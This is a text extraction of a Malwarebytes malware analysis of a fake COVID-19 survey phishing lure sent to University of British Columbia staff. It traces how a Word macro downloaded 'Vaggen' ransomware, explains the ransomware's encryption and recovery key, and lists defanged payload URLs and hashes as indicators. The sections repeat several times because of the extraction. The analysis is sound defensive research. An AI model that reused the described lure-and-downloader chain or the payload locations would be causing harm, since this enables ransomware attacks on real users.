3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1763 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1764 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1765 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1766 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1767 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1768 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1769 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1770 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1771 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1772 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1773 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1774 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1775 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1776 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1777 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1778 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1779 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1780 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1781 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1782 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1783 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1784 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1785 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1786 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1787 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1788 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1789 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1790 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1791 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1792 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1793 of 